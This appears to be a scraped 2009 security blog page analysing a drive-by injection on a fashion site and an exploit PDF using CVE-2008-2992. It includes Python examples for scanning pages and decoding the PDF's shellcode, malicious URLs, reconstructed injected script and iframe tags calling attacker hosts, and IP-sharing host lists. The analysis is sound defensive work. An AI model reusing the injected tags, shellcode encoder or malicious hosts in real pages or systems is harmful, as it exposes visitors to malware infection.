adamlukasz.w.interia.pl
aegis.aaops.w.interia.pl
agility.w.interia.pl
agro.chmielno.w.interia.pl
agro_beskidy.w.interia.pl
aidspl.w.interia.pl
aisza.koty.w.interia.pl
akszeing.w.interia.pl
aktowka.w.interia.pl
alfa_gaz.w.interia.pl
alkohole.w.interia.pl
allianz.marzena.w.interia.pl
anatomiac.w.interia.pl
anna.wroblewska.w.interia.pl
aquanet.w.interia.pl
assembling-directx.w.interia.pl
atiradeon.w.interia.pl
bdgalinscy.w.interia.pl
bierzwnik.w.interia.pl
bioqtr.w.interia.pl
blackwh.w.interia.pl
bura4.w.interia.pl
bw2_wilu.w.interia.pl
cats-musical.w.interia.pl
cliff4.w.interia.pl
deltah.w.interia.pl
der57.w.interia.pl
derbeth.w.interia.pl
dermanovum.w.interia.pl
devrex.w.interia.pl
dex11.w.interia.pl
diabko.w.interia.pl
dompodsosnami.ustka.w.interia.pl
doom2.w.interia.pl
dorota.dubel.w.interia.pl
dsjbygucias.w.interia.pl
ekklan.w.interia.pl
eurekaostrowska.w.interia.pl
eurolas.w.interia.pl
fantasy-web.w.interia.pl
fireasses.w.interia.pl
gad.w.domu.w.interia.pl
grazynkasiak.w.interia.pl
hcastillo.w.interia.pl
hetmanszopienice.w.interia.pl
hitmanweb.w.interia.pl
ibrandt.w.interia.pl
impzachslon.w.interia.pl
intervip.w.interia.pl
j.lenczowski.w.interia.pl
jamnior.w.interia.pl
jerzy.stachurski.w.interia.pl
jjdymek.w.interia.pl
kalender.w.interia.pl
klimaks.w.interia.pl
klubsmakoszy.w.interia.pl
konkaro.w.interia.pl
kotlandia.w.interia.pl
koty.orientalne.somalijskie.w.interia.pl
ktoz.w.interia.pl
kubapg2.w.interia.pl
logokrokus1994.w.interia.pl
mafia_gc.w.interia.pl
maine.coon.w.interia.pl
malspecszkol.w.interia.pl
marcin.majkut.w.interia.pl
marcinspooky.w.interia.pl
markey.w.interia.pl
maximx86.w.interia.pl
mike.s.w.interia.pl
mikrobus.poznan.w.interia.pl
mimbase.w.interia.pl
mparlicki.w.interia.pl
mszlak.w.interia.pl
naturemed.w.interia.pl
ncaur.w.interia.pl
neverhood.cygan.w.interia.pl
nihilism.w.interia.pl
odlewnia-lubelskie.w.interia.pl
opieka-drawsko.w.interia.pl
parafia.sztum.w.interia.pl
parda.w.interia.pl
pawelsiwek.w.interia.pl
phgrecja.w.interia.pl
poradnia-sztum.w.interia.pl
progs-jp.w.interia.pl
przedszkolenr2darlowo.w.interia.pl
ptmkwroclaw.w.interia.pl
pzw-brzana.w.interia.pl
refj.w.interia.pl
rodzinqowski.w.interia.pl
rymesa.w.interia.pl
ryszard-kujawa.w.interia.pl
ryszardtoczko.w.interia.pl
rytel.w.interia.pl
samotnia_christa.w.interia.pl
skorczyl.w.interia.pl
slawik.pl.w.interia.pl
sp910066kr.w.interia.pl
std-spz.w.interia.pl
stmalga.w.interia.pl
swatclinic.w.interia.pl
sz_n.w.interia.pl
szkolabork.w.interia.pl
sztum.w.interia.pl
teatr.miniatura.w.interia.pl
thelo0p.w.interia.pl
tmkartuz.w.interia.pl
tomekzurawski.w.interia.pl
turniejzeo.w.interia.pl
u.o.i.i.w.interia.pl
ulacompensa.w.interia.pl
wosp-mysliborz.w.interia.pl
www.deltah.w.interia.pl
zbysw.w.interia.pl
ziellona.w.interia.pl
ziolaiprzyprawy.w.interia.pl
zmuzyki.w.interia.pl
zsp-czarna-woda.w.interia.pl
navyowner.w.interia.pl

Thursday, October 15, 2009

Maya London (mayalondon.com) Was Compromised !! -- cbx-north.se, bio-age.ru:8080

While I was looking for Maya-related information through Google, I was suddenly stunned by a "This site may harm your computer" warning. It caught my attention, and the website was Maya London, "www.mayalondon.com".

Using the Fiddler tool, I was able to capture the HTTP traffic flowing between my guest system and the web server. The outcome: the main page of "www.mayalondon.com" had been injected with malicious links. Once a user browses to the infected site, the injected script redirects the browser to:

- http://cbx-north.se/buttons/bothnia.php
- http://bio-age.ru:8080/index.php


and another injected file, "swfobject.js", contains two malicious links:
- http://kryolan.com/images/favicon.php
- http://cbx-north.se/buttons/bothnia.php

The user is not stopped at one exploit: there is a further exploit chain at "http://cbx-north.se/buttons/bothnia.php" that separately loads an exploit PDF and an exploit Flash file onto the system. Detection results for the malicious Flash and PDF files used in this attack are still very low:

- cbx-north.se/buttons/bothnia.php?s=zwrUlbs&id=2 (PDF) (VT 4/41)
- cbx-north.se/buttons/bothnia.php?s=zwrUlbs&id=3 (Flash) (VT 2/41)
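To find this kind of injection from a saved copy of the page rather than a proxy capture, here is an added example (not the blog author's tooling): a small scanner that flags script and iframe references pointing off the site's own domain, hidden (0x0) iframes, and inline scripts that use document.write/unescape, then scans a same-origin script such as swfobject.js for embedded foreign URLs. The HTML and the swfobject.js body are constructed to mimic the injection described above, using the hosts named in the post.

```python
"""Scan a saved HTML page and its scripts for injected third-party loaders.
Added example; the sample page and script are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SUSPICIOUS_INLINE = re.compile(r"document\.write\s*\(|unescape\s*\(|fromCharCode|\beval\s*\(", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def is_foreign(url, site):
    """True if url points at a host outside the site's own registrable domain."""
    host = (urlsplit(url).hostname or "").lower()
    return bool(host) and host != site and not host.endswith("." + site)


class InjectionScanner(HTMLParser):
    def __init__(self, site):
        super().__init__()
        self.site = site.lower()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            src = a.get("src") or ""
            if is_foreign(src, self.site):
                self.findings.append(("external-script", src))
        elif tag == "iframe":
            src = a.get("src") or ""
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            if is_foreign(src, self.site):
                self.findings.append(("hidden-iframe" if hidden else "external-iframe", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data verbatim
        if self._in_script and SUSPICIOUS_INLINE.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))


def scan_page(html, site):
    p = InjectionScanner(site)
    p.feed(html)
    p.close()
    return p.findings


def foreign_urls_in_script(js, site):
    """URLs inside a (same-origin) script that lead off-site, e.g. a tampered swfobject.js."""
    return [u for u in URL_RE.findall(js) if is_foreign(u, site)]


# Constructed stand-ins modelled on the injection described in the post.
SAMPLE_PAGE = """<html><head><title>Maya London</title>
<script type="text/javascript" src="/js/swfobject.js"></script>
<script src="http://cbx-north.se/buttons/bothnia.php"></script>
</head><body>
<iframe src="http://bio-age.ru:8080/index.php" width="0" height="0" frameborder="0"></iframe>
<script>var s="%3Cdiv%3E";document.write(unescape(s));</script>
<p>Welcome to Maya London</p></body></html>"""

SAMPLE_SWFOBJECT = """/* constructed stand-in for the tampered swfobject.js */
var swfobject = function () {};
document.write('<iframe src="http://kryolan.com/images/favicon.php" width=1 height=1></iframe>');
document.write('<script src="http://cbx-north.se/buttons/bothnia.php"></script>');"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, "mayalondon.com"):
        print("page:", f)
    for u in foreign_urls_in_script(SAMPLE_SWFOBJECT, "mayalondon.com"):
        print("swfobject.js:", u)
```

The second function matters because a host-based check cannot see the second stage here: swfobject.js is served from the site's own origin, so the scanner has to open same-origin scripts and look at what they write into the page.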


From the script below, "bio-age.ru:8080" serves JavaScript that downloads an exploit PDF containing the Adobe util.printf overflow exploit (CVE-2008-2992).


Unsurprisingly, the exploit PDF file received a poor detection rate on VirusTotal. The attackers used heavily obfuscated JavaScript combined with script fragmentation to evade detection. I have to salute the attacker for making the analysis hard work.



When loaded in an unpatched Adobe Reader, the exploit PDF downloads malware (load.exe) from "http://youbio.ru:8080/main.php?id=5&hello21".


The hostnames "bio-age.ru:8080" and "youbio.ru:8080" point to the same IP address: 208.67.219.132


"cbx-north.se" -->IP Address: 195.47.247.121

Hostnames sharing same IP:
1099.se
1jma.net
addison.dk
aid-com.be
amodei.net
andersmagnusson.net
archifacts.net
arerosseland.com
arstahavsbad.net
arubalandscape.net
arvidson.dk
aspdalen.net
betinafriis.net
beyondthenorthwaves.net
bgof.net
birgit-iren.net
bogbasen.dk
bornholmerferier.dk
carloscicchelli.net
casa50.net
cbx-north.se
cdrcrd.com
clubcosmos.net
crispycat.com
cybospace.net
datavagen.com
dbs16.dk
eng-dal.net
faudo.net
ferieitoscana.net
fiberdanmark.dk
fjellhamarfk.net
footballglobe.net
fossekallen.net
fotbollstrojor.net
franzensandberg.net
frodeandersen.net
gizl.nl
glitr.net
gmprod.net
goergen.net
grandiscrew.net
gunmancentral.net
hanekam.net
haraldriise.net
hounds.dk
hsl.be
indelfa.com
innovationmarket.net
insats.net
insg.nl
instituut-waldorf.be
jeromedeperlinghi.net
jhlan.net
jkann.net
jolv.net
ka-kjing.net
kaffesukker.net
kajhelge.net
kloverblomman.net
koksijde.net
kureer.net
kvalitena.net
leeuwerke.net
leksebistand.net
lemuelbooks.net
lifeonacouch.net
lillehammerbaptist.net
loshavnsidene.net
lostinberlin.net
lyd-tekniker.net
mail2.nykroppa.se
malerimetoder.se
memorybar.net
mhastings.net
mitrapa.se
morden.dk
muzinfo.net
nittfors.net
ns2.cdrcrd.com
nykroppa.se
oehlenschlager.dk
ole-andreas.net
olethore.net
oppegaende.net
oshorisk.dk
peture.net
pilegrim.net
problematisk.net
relihq.net
rkcc.dk
roennerhavnen.dk
seules.net
sidenmin.net
sikkerhedsnettet.net
smuthullet.net
spar2design.dk
spd-mv.de
srv71.b-one.net
stromvoll.net
sunile.no
sunnydisposition.net
thaiwok.se
theien.net
theil.dk
tollerforum.net
trikster.net
trim1.net
ultra-ragnar.net
usenethelp.net
vinnpenger.net
voldesign.net
webbkampanj.net
wickedfriends.net
www.bornholmerferier.dk
www.malerimetoder.se
www.mitrapa.se
www.pirken.dk
www.sunile.no
www.thaiwok.se
xweza.com
zirconium-inc.net


IP Address: 208.67.219.132

bio-age.ru:8080
youbio.ru:8080
goowy.net
iris-germany.com
quienestadetrasdelascuarderias.org


IP Address: 78.46.45.77

*.bestensee.de
*.kryolan.com
*.omatix.de
bestensee.de
cydico.com
dermacolor-camouflage.net
gut.de
haby.net
kryolan.us
kryolan.com
linear-software.de
lwb-info.de
omatix.de
rbo-info.de
s10.omatix.de
static.77.45.46.78.clients.your-server.de
www.bestensee.de
www.kryolan.de
www.omatix.de


P/S: The webmaster of "www.mayalondon.com" has suspended the website for maintenance to clean up the malicious code.

Wednesday, October 14, 2009

Analysis De-Obfuscate Malicious Exploit PDF File

Client-side exploitation via PDF files continues to be one of the most popular client attack vectors, especially when it targets the zero-day in Adobe 9.13.

Below is a screenshot of the JavaScript, viewable after it was unpacked with a self-built tool.


The whole JavaScript content was copied and pasted into the Malzilla decoder to de-obfuscate it. However, the JavaScript was protected by a second encoding layer. To determine the final intent of the shellcode, I had to strip this additional obfuscation layer, which exists to evade detection.

Replacing every occurrence of the substring "\" with "%" turns the escaped literal back into the %uXXXX form that unescape() understands, so the string can be converted back into readable binary.



Finally the code was converted into readable form. However, it seems there is still shellcode that downloads malware after exploiting an unpatched Adobe Reader.


The final layer was de-obfuscated using the "UCS" method (decoding each %uXXXX escape as a 16-bit UCS-2 code unit and writing it out as two bytes), revealing the malicious download link.
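The three steps described above, stream unpacking, the backslash-to-percent trick, and the UCS-2 decode, as an added worked example in Python (not the author's self-built tool or Malzilla). The sample PDF container and the escaped shellcode inside it are constructed for the example: the shellcode is a few NOP bytes plus the download URL the post names, encoded as \uXXXX little-endian units the way the real sample was; the util.printf call is only a stand-in marker for the CVE-2008-2992 trigger. The extractor only handles JavaScript held in FlateDecode streams, which is an assumption about the sample layout.

```python
"""Unpack a PDF's streams, find the JavaScript, strip the two escape layers and
recover the download URL from the shellcode. Added example with constructed input."""
import re
import struct
import zlib

STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\nendstream", re.S)
JS_MARKERS = (b"unescape(", b"eval(", b"util.printf", b"String.fromCharCode")
ESCAPE_RUN = re.compile(r"(?:\\u[0-9a-fA-F]{4}){4,}")      # runs of \uXXXX literals
PCT_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
ASCII_RE = re.compile(rb"[\x20-\x7e]{6,}")


def inflate(data):
    """FlateDecode; returns the raw bytes unchanged if they are not zlib data."""
    try:
        d = zlib.decompressobj()
        return d.decompress(data) + d.flush()
    except zlib.error:
        return data


def find_javascript(pdf):
    """Step 1 (the 'self-built tool'): inflate every stream, keep the ones that look like JS."""
    streams = (inflate(m.group(1)) for m in STREAM_RE.finditer(pdf))
    return [s.decode("latin-1") for s in streams if any(k in s for k in JS_MARKERS)]


def layer1(js_literal):
    """Step 2: the literal is written as \\u9090...; swapping \\ for % gives unescape() input."""
    return js_literal.replace("\\", "%")


def js_unescape(s):
    """Python equivalent of JavaScript's unescape(): %uXXXX and %XX to code units."""
    return PCT_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def ucs2_to_bytes(s):
    """Step 3 (the 'UCS' method): each code unit is two little-endian bytes of shellcode."""
    return b"".join(struct.pack("<H", ord(c)) for c in s)


def strings(data):
    return [m.group().decode() for m in ASCII_RE.finditer(data)]


def recover_shellcode(js):
    return b"".join(ucs2_to_bytes(js_unescape(layer1(run))) for run in ESCAPE_RUN.findall(js))


def download_urls(pdf):
    """Whole pipeline: PDF bytes -> URLs embedded in the decoded shellcode."""
    urls = []
    for js in find_javascript(pdf):
        urls += [s for s in strings(recover_shellcode(js)) if "://" in s]
    return urls


# ---- constructed sample, built the way the real one was encoded -------------
SHELLCODE = b"\x90" * 4 + b"\xeb\x10" + b"http://youbio.ru:8080/main.php?id=5&hello21" + b"\x00"


def to_backslash_u(data):
    """Encoder used only to build the sample: bytes -> \\uXXXX little-endian units."""
    if len(data) % 2:
        data += b"\x00"
    return "".join("\\u%04x" % u for (u,) in struct.iter_unpack("<H", data))


SAMPLE_JS = ('function p(){var n="\\u9090";var sc="' + to_backslash_u(SHELLCODE) +
             '";var h=unescape(sc);util.printf("%45000f",0);}')   # printf call is a stand-in


def build_sample_pdf(js):
    """Minimal container with one FlateDecode stream; enough for the extractor, not a viewable PDF."""
    body = zlib.compress(js.encode("latin-1"))
    return (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction << /S /JavaScript /JS 2 0 R >> >>\n"
            b"endobj\n2 0 obj\n<< /Length " + str(len(body)).encode() +
            b" /Filter /FlateDecode >>\nstream\n" + body + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    print(download_urls(build_sample_pdf(SAMPLE_JS)))
```

Two details carry over to real samples. The backslash form only exists because the attacker wrote the payload as a JavaScript string literal, so the JS engine would have done the unescaping itself at runtime; the analyst has to redo it by hand, which is what the "\" to "%" swap is. And the byte order in ucs2_to_bytes is what makes the "UCS" step produce shellcode rather than text: %u9090 is one 16-bit unit written little-endian, which is why NOP sleds show up as \u9090 and why a URL inside the shellcode is only readable after the decode.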


The exploit PDF file got a poor detection rate when submitted to VirusTotal: only 4/41 engines detect it.



Malicious link "domensm.cn" (59.125.231.252)

Hostnames sharing the same IP address:

awamujirapa.com
crash-cxim.cn
cxim-way.cn
domenpoxuj.cn
domensm.cn
google-update-checker.cn
idkfa.cn
kenstwistedminde.com
kloumixooon.cn
mail.adobe-updating-service.cn
mail.awamujirapa.com
mail.cxim-way.cn
mail.cximnik.cn
mail.domenpoxuj.cn
mail.eg4110.com
mail.idkfa.cn
mail.kloumixooon.cn
mail.olokedu.com
mail.sashahost.cn
mail.usrvnu.ru
mail.usrvzi.ru
mail.wesssrett.cn
mail.xewyny.ru
muzzon837.cn
mydearmishima.com
myspeedstrip.com
ns1.eg4110.com
ns2.eg4110.com
ola-la.cn
olokedu.com
peezero.net
pi-samba.com
pumigamez.com
sashahost.cn
seekasonghere.com
shkens.net
theslytube.com
tubepornsearchonline.com
usrvzi.ru
wesssrett.cn
www.adwarcontrol.cn
www.idkfa.cn
www.kloumixooon.cn
www.mydearmishima.com
www.shkens.net
www.tubepornsearchonline.com
www.usrvzi.ru
xewyny.ru